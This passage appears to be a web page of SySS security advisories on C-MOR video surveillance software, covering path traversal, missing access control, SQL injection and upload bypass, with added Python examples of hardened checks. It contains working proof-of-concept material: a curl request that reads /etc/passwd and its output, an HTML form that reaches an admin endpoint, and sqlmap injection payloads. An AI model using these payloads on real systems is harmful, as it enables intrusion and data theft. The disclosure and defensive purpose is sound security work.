advisories<br />2024-04-08: Exchange regarding security updates and disclosure timeline<br />2024-05-08: Further exchange concerning security updates and disclosure<br /> timeline; public release of all security advisories<br /> scheduled for release of C-MOR Video Surveillance version 6<br />2024-05-10: Release of C-MOR software version 5.30 with security updates<br /> for some reported security issues<br />2024-07-19: E-mail to manufacturer concerning 
release date of C-MOR<br /> Video Surveillance version 6; response with planned<br /> release date of 2024-08-01<br />2024-07-30: E-mail from manufacturer with further information<br /> concerning security fixes<br />2024-07-31: Release of C-MOR software version 6.00PL1<br />2024-09-04: Public release of security advisory<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for C-MOR Video Surveillance<br /> https://www.c-mor.com/<br />[2] SySS Security Advisory SYSS-2024-026<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-026.txt<br />[3] SySS Security Advisory SYSS-2024-024<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-024.txt<br />[4] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Chris Beiter and Frederik<br />Beimgraben.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
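The root cause the advisory names is a substring test: a name is accepted if it contains ".cbkf" anywhere, so the real extension that the web server acts on can be ".php". The Python example below is added here and is not C-MOR's code (the advisory does not reproduce it); it places that substring check next to an anchored check that requires ".cbkf" to be the final extension, rejects path components, and never reuses the client-supplied name on disk. The file names in it are constructed test cases.

```python
"""Added example (not the C-MOR code, which the advisory does not show):
the substring condition the advisory describes, beside a check that
would have rejected "webshell.cbkf.php".

Assumption: the vulnerable condition is literally 'file name contains
".cbkf"', as stated in the advisory; how the real code spells it is
unknown.  CONSTRUCTED_CASES are made up for this example."""
import os
import re
import secrets
from typing import Dict, List, Tuple

# Anchored allowlist: a short stem, then ".cbkf" as the one and only
# extension.  Anything with a slash, a second extension or ".." fails.
_SAFE_BACKUP_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.cbkf$")


def accepts_vulnerable(filename: str) -> bool:
    """The advisory's condition: any name containing ".cbkf" is accepted,
    so the trailing extension the web server executes can be anything."""
    return ".cbkf" in filename


def accepts_hardened(filename: str) -> bool:
    """Whole-name match on the basename only."""
    if filename != os.path.basename(filename):      # rejects "../x" and "a/b"
        return False
    return _SAFE_BACKUP_NAME.fullmatch(filename) is not None


def storage_name(filename: str) -> str:
    """Name to use on disk.  The client's name is only used after validation,
    and a random prefix keeps the stored path unpredictable, so even a
    later validation gap does not hand an attacker a chosen URL under
    the webroot (the advisory's https://<HOST>/backup/upload_<FILENAME>)."""
    if not accepts_hardened(filename):
        raise ValueError("rejected upload name")
    stem = filename[: -len(".cbkf")]
    return "upload_" + secrets.token_hex(8) + "_" + stem + ".cbkf"


CONSTRUCTED_CASES: List[str] = [
    "backup-2024-06.cbkf",        # legitimate backup name
    "webshell.cbkf.php",          # the advisory's PoC name
    "../../etc/cron.d/x.cbkf",    # traversal with a "valid" extension
    "shell.cbkf/../x.php",        # ".cbkf" hidden in a directory component
]


def demo() -> Dict[str, Tuple[bool, bool]]:
    """Map each case to (accepted by vulnerable check, accepted by hardened check)."""
    return {name: (accepts_vulnerable(name), accepts_hardened(name))
            for name in CONSTRUCTED_CASES}


if __name__ == "__main__":
    for name, (vuln, hard) in demo().items():
        print(f"{name:28s} vulnerable={vuln!s:5s} hardened={hard}")
```

The name check is only half of the fix: the other half is that the directory the uploads land in must be served without script execution, because a validation bug is far more likely than a web server bug and the second control makes the first one's failure harmless.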
<pre><code>Advisory ID: SYSS-2024-025<br />Product: C-MOR Video Surveillance<br />Manufacturer: za-internet GmbH<br />Affected Version(s): 5.2401<br />Tested Version(s): 5.2401<br />Vulnerability Type: Relative Path Traversal (CWE-23)<br />Risk Level: High<br />Solution Status: Fixed<br />Manufacturer Notification: 2024-04-05<br />Solution Date: 2024-07-31<br />Public Disclosure: 2024-09-04<br />CVE Reference: CVE-2024-45178<br />Authors of Advisory: Chris Beiter, Frederik Beimgraben,<br /> and Matthias Deeg<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The software product C-MOR is an IP video surveillance system.<br /><br />The manufacturer describes the product as follows:<br /><br />"With C-MOR video surveillance, it is possible to check your<br />surveillance over network and the Internet. You can access the live<br />view as well as previous recordings from any PC or mobile device.<br />C-MOR is managed and controlled over the C-MOR web interface.<br />IP settings, camera recording setup, user rights and so on are set<br />over the web without the installation of any software on the<br />client."[1]<br /><br />Due to improper user input validation, it is possible to download<br />arbitrary files from the C-MOR system via a path traversal attack.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />By analyzing the C-MOR web interface, it was found that different<br />functionalities are vulnerable to path traversal attacks, which is<br />due to insufficient user input validation.<br /><br />For instance, the download functionality for backups provided by the<br />script "download-bkf.pml" is vulnerable to a path traversal<br />attack via the parameter "bkf".<br /><br />This enables an authenticated user to download arbitrary files as<br />Linux user "www-data" from the C-MOR system.<br /><br />Another path traversal 
attack is in the script "show-movies.pml",<br />which can be exploited via the parameter "cam".<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />Using the following HTTP POST request with the relative path<br />"../../../../etc/passwd" as value for the parameter "bkf", it is<br />possible to download the file "/etc/passwd":<br /><br />POST /download-bkf.pml HTTP/1.1<br />Host: <HOST><br />Authorization: Basic <CREDENTIALS><br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 26<br /><br />bkf=../../../../etc/passwd<br /><br /><br />An example of a successful path traversal attack is demonstrated via<br />the following curl command:<br /><br />$ curl -X POST -d 'bkf=../../../../etc/passwd' \<br /> --user '<USERNAME>:<PASSWORD>' --ciphers 'DEFAULT:!DH' \<br /> https://<HOST>/download-bkf.pml<br />root:x:0:0:root:/root:/bin/bash<br />daemon:x:1:1:daemon:/usr/sbin:/bin/sh<br />bin:x:2:2:bin:/bin:/bin/sh<br />sys:x:3:3:sys:/dev:/bin/sh<br />sync:x:4:65534:sync:/bin:/bin/sync<br />games:x:5:60:games:/usr/games:/bin/sh<br />man:x:6:12:man:/var/cache/man:/bin/sh<br />lp:x:7:7:lp:/var/spool/lpd:/bin/sh<br />mail:x:8:8:mail:/var/mail:/bin/sh<br />news:x:9:9:news:/var/spool/news:/bin/sh<br />uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh<br />proxy:x:13:13:proxy:/bin:/bin/sh<br />www-data:x:33:33:www-data:/var/www:/bin/sh<br />backup:x:34:34:backup:/var/backups:/bin/sh<br />list:x:38:38:Mailing List Manager:/var/list:/bin/sh<br />irc:x:39:39:ircd:/var/run/ircd:/bin/sh<br />gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh<br />nobody:x:65534:65534:nobody:/nonexistent:/bin/sh<br />libuuid:x:100:101::/var/lib/libuuid:/bin/sh<br />Debian-exim:x:101:103::/var/spool/exim4:/bin/false<br />statd:x:102:65534::/var/lib/nfs:/bin/false<br />sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin<br />cam:x:1000:1000:Cam,,,:/home/cam:/bin/bash<br 
/>postfix:x:104:107::/var/spool/postfix:/bin/false<br />stunnel4:x:105:109::/var/run/stunnel4:/bin/false<br />mysql:x:106:110:MySQL Server,,,:/var/lib/mysql:/bin/false<br />messagebus:x:107:113::/var/run/dbus:/bin/false<br />ntp:x:108:114::/home/ntp:/bin/false<br />download:x:1002:1002:Download User:/home/download:/bin/bash<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Install C-MOR Video Surveillance version 6.00PL1.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-05: Vulnerability reported to manufacturer<br />2024-04-05: Manufacturer acknowledges receipt of security advisories<br />2024-04-08: Exchange regarding security updates and disclosure timeline<br />2024-05-08: Further exchange concerning security updates and disclosure<br /> timeline; public release of all security advisories<br /> scheduled for release of C-MOR Video Surveillance version 6<br />2024-05-10: Release of C-MOR software version 5.30 with security updates<br /> for some reported security issues<br />2024-07-19: E-mail to manufacturer concerning release date of C-MOR<br /> Video Surveillance version 6; response with planned<br /> release date of 2024-08-01<br />2024-07-30: E-mail from manufacturer with further information<br /> concerning security fixes<br />2024-07-31: Release of C-MOR software version 6.00PL1<br />2024-09-04: Public release of security advisory<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for C-MOR Video Surveillance<br /> https://www.c-mor.com/<br />[2] SySS Security Advisory SYSS-2024-025<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-025.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy/<br /><br 
/>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Chris Beiter, Frederik<br />Beimgraben, and Matthias Deeg.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
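Both this advisory and SYSS-2024-028 above exploit the same handler: download-bkf.pml takes a file name in `bkf` and opens it relative to a backup directory without checking where the resulting path ends up. The Python example below is added here and is not from either advisory or from C-MOR (whose handler code is not shown); it builds a temporary directory tree with constructed files, reproduces the `../../../etc/ip.cam1` leak against a naive join, and shows a containment check that resolves the path first and then verifies it is still under the backup root.

```python
"""Added example (not from the SySS advisories): a containment check for
a download handler like download-bkf.pml.

Assumptions: the real backup directory and the handler's code are not in
the advisories; this uses a temporary directory with constructed files.
The fake etc/ip.cam1 stands in for the camera credential file named in
SYSS-2024-028."""
import os
import tempfile
from pathlib import Path


def resolve_in_root(root: str, requested: str) -> Path:
    """Resolve `requested` under `root` and refuse anything that escapes it.

    resolve() collapses "..", follows symlinks and normalises repeated
    slashes, so the check is made on the real target rather than on the
    string the client sent.  Absolute input is rejected up front because
    joining an absolute path would silently discard `root`."""
    root_real = Path(root).resolve()
    if os.path.isabs(requested):
        raise PermissionError("absolute paths are not allowed")
    target = (root_real / requested).resolve()
    if target != root_real and root_real not in target.parents:
        raise PermissionError("path escapes backup directory: " + requested)
    return target


def read_backup_vulnerable(root: str, bkf: str) -> bytes:
    """Plain join: "../../../etc/ip.cam1" walks straight out of root."""
    with open(os.path.join(root, bkf), "rb") as fh:
        return fh.read()


def read_backup_hardened(root: str, bkf: str) -> bytes:
    with open(resolve_in_root(root, bkf), "rb") as fh:
        return fh.read()


def demo() -> dict:
    """Constructed layout: <tmp>/srv/www/backups/site.cbkf as a legitimate
    backup and <tmp>/etc/ip.cam1 three levels up, mirroring the depth of
    the advisory's "../../../etc/ip.cam1" request."""
    base = Path(tempfile.mkdtemp())
    backups = base / "srv" / "www" / "backups"
    backups.mkdir(parents=True)
    (backups / "site.cbkf").write_bytes(b"backup-data")
    (base / "etc").mkdir()
    (base / "etc" / "ip.cam1").write_bytes(b"192.168.1.11\n80\ncamuser\ncampass\n")

    traversal = "../../../etc/ip.cam1"
    result = {
        "legit": read_backup_hardened(str(backups), "site.cbkf"),
        "vulnerable_leak": read_backup_vulnerable(str(backups), traversal),
    }
    try:
        read_backup_hardened(str(backups), traversal)
        result["hardened_blocked"] = False
    except PermissionError:
        result["hardened_blocked"] = True
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:16s} {value!r}")
```

Checking the resolved path rather than rejecting ".." in the input string matters because URL-encoded, doubled or symlinked variants all bypass a string filter but not a check on the real target.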
<pre><code>Advisory ID: SYSS-2024-024<br />Product: C-MOR Video Surveillance<br />Manufacturer: za-internet GmbH<br />Affected Version(s): 5.2401<br />Tested Version(s): 5.2401<br />Vulnerability Type: Improper Access Control (CWE-284)<br />Risk Level: High<br />Solution Status: Fixed<br />Manufacturer Notification: 2024-04-05<br />Solution Date: 2024-07-31<br />Public Disclosure: 2024-09-04<br />CVE Reference: CVE-2024-45170<br />Authors of Advisory: Chris Beiter, Frederik Beimgraben,<br /> and Matthias Deeg<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The software product C-MOR is an IP video surveillance system.<br /><br />The manufacturer describes the product as follows:<br /><br />"With C-MOR video surveillance, it is possible to check your<br />surveillance over network and the Internet. You can access the live<br />view as well as previous recordings from any PC or mobile device.<br />C-MOR is managed and controlled over the C-MOR web interface.<br />IP settings, camera recording setup, user rights and so on are set<br />over the web without the installation of any software on the<br />client."[1]<br /><br />Due to improper or missing access control, low-privileged users can<br />use administrative functions of the C-MOR web interface.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />By analyzing the C-MOR web interface, it was found that different<br />functions are only available to administrative users.<br /><br />However, access to those functions is restricted via the web application<br />user interface and not checked on the server side.<br /><br />Thus, by sending corresponding HTTP requests to the web server of the<br />C-MOR web interface, low-privileged users can also use administrative<br />functionality, for instance downloading backup files or changing<br />configuration settings.<br /><br 
/>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />In this example, a low-privileged user downloads backup files by<br />directly sending a corresponding HTTP POST request to the page<br />"download-bkf.pml".<br /><br />For this, the following HTML code can be used:<br /><br /><html><br /> <body><br /> <form action="https://<HOST>/download-bkf.pml" method="POST"><br /> <input type="text" name="bkf" value="" placeholder="Please <br />insert the file name." /><br><br /> <input type="submit" value="Download"><br /> </form><br /> </body><br /></html><br /><br /><br />This PoC attack can also be performed using the following curl command:<br /><br />curl -X POST -d '<FILENAME>' --user '<USERNAME:PASSWORD>' --ciphers <br />'DEFAULT:!DH' https://<HOST>/download-bkf.pml<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Install C-MOR Video Surveillance version 6.00PL1.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-05: Vulnerability reported to manufacturer<br />2024-04-05: Manufacturer acknowledges receipt of security advisories<br />2024-04-08: Exchange regarding security updates and disclosure timeline<br />2024-05-08: Further exchange concerning security updates and disclosure<br /> timeline; public release of all security advisories<br /> scheduled for release of C-MOR Video Surveillance version 6<br />2024-05-10: Release of C-MOR software version 5.30 with security updates<br /> for some reported security issues<br />2024-07-19: E-mail to manufacturer concerning release date of C-MOR<br /> Video Surveillance version 6; response with planned<br /> release date of 2024-08-01<br />2024-07-30: E-mail from manufacturer with further information<br /> concerning security fixes<br />2024-07-31: Release of C-MOR software version 6.00PL1<br />2024-09-04: 
Public release of security advisory<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for C-MOR Video Surveillance<br /> https://www.c-mor.com/<br />[2] SySS Security Advisory SYSS-2024-024<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-024.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Chris Beiter and Frederik<br />Beimgraben.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
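<p>The access control flaw in SYSS-2024-024 is the classic pattern of hiding an administrative function in the UI while the server never re-checks the caller's role. The following Python model, added here as an example and not C-MOR's own code, shows the vulnerable and the fixed handler side by side and replays the advisory's PoC request (a direct POST to download-bkf.pml by a low-privileged user) against both. The page name download-bkf.pml and the form field bkf come from the advisory; the account table, the role names, the live-view.pml endpoint and the audit log are constructed.</p>

```python
"""Server-side authorization for an admin-only endpoint (constructed demo)."""
import hmac
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional, Tuple

# Constructed account table. The role lives server-side; it is never read
# from anything the client sends.
USERS = {
    "admin":  {"password": "admin-secret",  "role": "admin"},
    "viewer": {"password": "viewer-secret", "role": "user"},
}

AUDIT_LOG = []  # denied requests land here; ship these to your SIEM in practice


@dataclass
class Request:
    method: str
    path: str
    auth: Tuple[str, str]                      # HTTP basic auth (user, password)
    form: Dict[str, str] = field(default_factory=dict)


@dataclass
class Response:
    status: int
    body: str


def authenticate(req: Request) -> Optional[str]:
    """Return the user name if the credentials are valid, else None."""
    user, password = req.auth
    record = USERS.get(user)
    if record is None or not hmac.compare_digest(record["password"], password):
        return None
    return user


def requires_role(role: str):
    """Decorator enforcing the role on the server, independent of what the UI shows."""
    def decorate(handler: Callable[[Request, str], Response]):
        def wrapped(req: Request, user: str) -> Response:
            if USERS[user]["role"] != role:
                AUDIT_LOG.append(f"DENY user={user} {req.method} {req.path}")
                return Response(403, "forbidden")
            return handler(req, user)
        return wrapped
    return decorate


# Vulnerable pattern: the handler assumes only admins reach it because the
# web UI hides the download link from other users. A direct POST bypasses that.
def download_bkf_vulnerable(req: Request, user: str) -> Response:
    return Response(200, f"[backup data for {req.form.get('bkf', '')}]")


# Fixed pattern: same handler body, but the role check runs on every request.
@requires_role("admin")
def download_bkf_fixed(req: Request, user: str) -> Response:
    return Response(200, f"[backup data for {req.form.get('bkf', '')}]")


def live_view(req: Request, user: str) -> Response:
    return Response(200, "[live view]")  # hypothetical page open to every user


def dispatch(req: Request, routes: Dict[Tuple[str, str], Callable]) -> Response:
    user = authenticate(req)
    if user is None:
        return Response(401, "unauthorized")
    handler = routes.get((req.method, req.path))
    if handler is None:
        return Response(404, "not found")
    return handler(req, user)


VULNERABLE_ROUTES = {("POST", "/download-bkf.pml"): download_bkf_vulnerable,
                     ("GET", "/live-view.pml"): live_view}
FIXED_ROUTES = {("POST", "/download-bkf.pml"): download_bkf_fixed,
                ("GET", "/live-view.pml"): live_view}


def demo() -> Dict[str, int]:
    """Replay the PoC request as the low-privileged user against both route
    tables and return the HTTP status codes the server would answer with."""
    poc = Request("POST", "/download-bkf.pml", ("viewer", "viewer-secret"),
                  {"bkf": "backup-constructed.bkf"})
    admin = Request("POST", "/download-bkf.pml", ("admin", "admin-secret"),
                    {"bkf": "backup-constructed.bkf"})
    return {
        "viewer_vulnerable": dispatch(poc, VULNERABLE_ROUTES).status,   # 200
        "viewer_fixed": dispatch(poc, FIXED_ROUTES).status,             # 403
        "admin_fixed": dispatch(admin, FIXED_ROUTES).status,            # 200
        "bad_password": dispatch(Request("POST", "/download-bkf.pml",
                                         ("viewer", "wrong")), FIXED_ROUTES).status,  # 401
    }


if __name__ == "__main__":
    print(demo())
    print("\n".join(AUDIT_LOG))
```

<p>The point of the decorator is that the authorization decision is attached to the handler itself, so it cannot be skipped by calling the endpoint directly. The denied requests are also worth logging: an account with the "user" role repeatedly hitting an admin-only path is exactly the signal a detection rule for this class of bug should look for.</p>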
<pre><code>Advisory ID: SYSS-2024-023<br />Product: C-MOR Video Surveillance<br />Manufacturer: za-internet GmbH<br />Affected Version(s): 5.2401, 6.00PL01<br />Tested Version(s): 5.2401, 6.00PL01<br />Vulnerability Type: SQL Injection (CWE-89)<br />Risk Level: High<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-05<br />Solution Date: -<br />Public Disclosure: 2024-09-04<br />CVE Reference: CVE-2024-45174<br />Authors of Advisory: Chris Beiter, Frederik Beimgraben,<br /> and Matthias Deeg<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The software product C-MOR is an IP video surveillance system.<br /><br />The manufacturer describes the product as follows:<br /><br />"With C-MOR video surveillance, it is possible to check your<br />surveillance over network and the Internet. You can access the live<br />view as well as previous recordings from any PC or mobile device.<br />C-MOR is managed and controlled over the C-MOR web interface.<br />IP settings, camera recording setup, user rights and so on are set<br />over the web without the installation of any software on the<br />client."[1]<br /><br />Due to improper validation of user-supplied data, different<br />functionalities of the C-MOR web interface are vulnerable to SQL<br />injection attacks.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />By analyzing the C-MOR web interface, it was found that several<br />functionalities provided by the C-MOR web interface are vulnerable<br />to SQL injection attacks.<br /><br />These kinds of attacks allow an authenticated user to execute arbitrary<br />SQL commands in the context of the corresponding MySQL database.<br /><br />SQL injection vulnerabilities were found in the following pages:<br /><br />* list-timelapse.plm (URL parameter "cam")<br />* list-motion.plm (URL parameter "cam")<br />* 
show-movies.plm (URL parameter "cam")<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />Using the software tool sqlmap[4], the SQL injection vulnerabilities<br />via the URL parameter "cam" could be exploited with little effort, as<br />the following example output illustrates:<br /><br />(...)<br />sqlmap resumed the following injection point(s) from stored session:<br />---<br />Parameter: cam (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or <br />GROUP BY clause (FLOOR)<br /> Payload: days=1100&cam=cam1 AND (SELECT 2483 FROM(SELECT <br />COUNT(*),CONCAT(0x717a707071,(SELECT <br />(ELT(2483=2483,1))),0x717a707871,FLOOR(RAND(0)*2))x FROM <br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: days=1100&cam=cam1 AND (SELECT 9790 FROM <br />(SELECT(SLEEP(5)))Yfcf)<br />---<br />[17:16:12] [INFO] the back-end DBMS is MySQL<br />[17:16:12] [INFO] fetching banner<br />[17:16:12] [INFO] resumed: '5.1.66-0+squeeze1'<br />web application technology: Apache<br />back-end DBMS: MySQL >= 5.0<br />banner: '5.1.66-0+squeeze1'<br />(...)<br /><br /><br />By exploiting the SQL injection vulnerabilities, the MySQL database<br />could be accessed and dumped as database user "cam".<br /><br />In version 6.00PL01, some SQL injection attack instances were fixed.<br />However, others could still be found, for example via the URL<br />parameter "c" on the page getpic.pml.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />The described security vulnerability has not been fixed entirely in<br />the newly released software version 6.00PL01.<br /><br />There is no fix for this security issue.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure 
Timeline:<br /><br />2024-04-05: Vulnerability reported to manufacturer<br />2024-04-05: Manufacturer acknowledges receipt of security advisories<br />2024-04-08: Exchange regarding security updates and disclosure timeline<br />2024-05-08: Further exchange concerning security updates and disclosure<br /> timeline; public release of all security advisories<br /> scheduled for release of C-MOR Video Surveillance version 6<br />2024-05-10: Release of C-MOR software version 5.30 with security updates<br /> for some reported security issues<br />2024-07-19: E-mail to manufacturer concerning release date of C-MOR<br /> Video Surveillance version 6; response with planned<br /> release date of 2024-08-01<br />2024-07-30: E-mail from manufacturer with further information<br /> concerning security fixes<br />2024-07-31: Release of C-MOR software version 6.00PL1<br />2024-09-04: Public release of security advisory<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for C-MOR Video Surveillance<br /> https://www.c-mor.com/<br />[2] SySS Security Advisory SYSS-2024-023<br /> <br />https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-023.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy/<br />[4] sqlmap GitHub repository<br /> https://github.com/sqlmapproject/sqlmap<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Chris Beiter, Frederik<br />Beimgraben, and Matthias Deeg.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. 
The<br />latest version of this security advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
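<p>SYSS-2024-023 reports that the "cam" (and, per the sqlmap output, "days") request parameters reach the SQL text unchanged. The following Python example is added here and is not C-MOR code: it mirrors a recording listing like list-motion.plm with a string-built query next to a parameterized one, and runs a benign request and a simple boolean-based injection through both. The table, its rows, the query shape and the injected value are constructed; SQLite stands in for the product's MySQL so the demo is self-contained.</p>

```python
"""String-built versus parameterized queries for "cam" and "days" (constructed demo)."""
import re
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three recordings from three cameras."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE movies (name TEXT, cam TEXT, age_days INTEGER)")
    conn.executemany("INSERT INTO movies VALUES (?, ?, ?)", [
        ("motion_0001.avi", "cam1", 2),
        ("motion_0002.avi", "cam2", 5),
        ("motion_0003.avi", "cam3", 40),
    ])
    return conn


def list_movies_vulnerable(conn, cam: str, days: str) -> List[str]:
    # Both request parameters are interpolated into the SQL text, so a quote
    # in "cam" or an operator in "days" rewrites the WHERE clause.
    sql = f"SELECT name FROM movies WHERE cam = '{cam}' AND age_days <= {days}"
    return [row[0] for row in conn.execute(sql)]


def query_parameterized(conn, cam: str, days_int: int) -> List[str]:
    # Placeholders: the driver sends the values separately from the SQL text,
    # so whatever "cam" contains is compared literally, never parsed as SQL.
    sql = "SELECT name FROM movies WHERE cam = ? AND age_days <= ?"
    return [row[0] for row in conn.execute(sql, (cam, days_int))]


# Camera identifiers in this product look like "cam1"; a strict allow-list is
# cheap defence in depth on top of parameterization (and rejects junk early).
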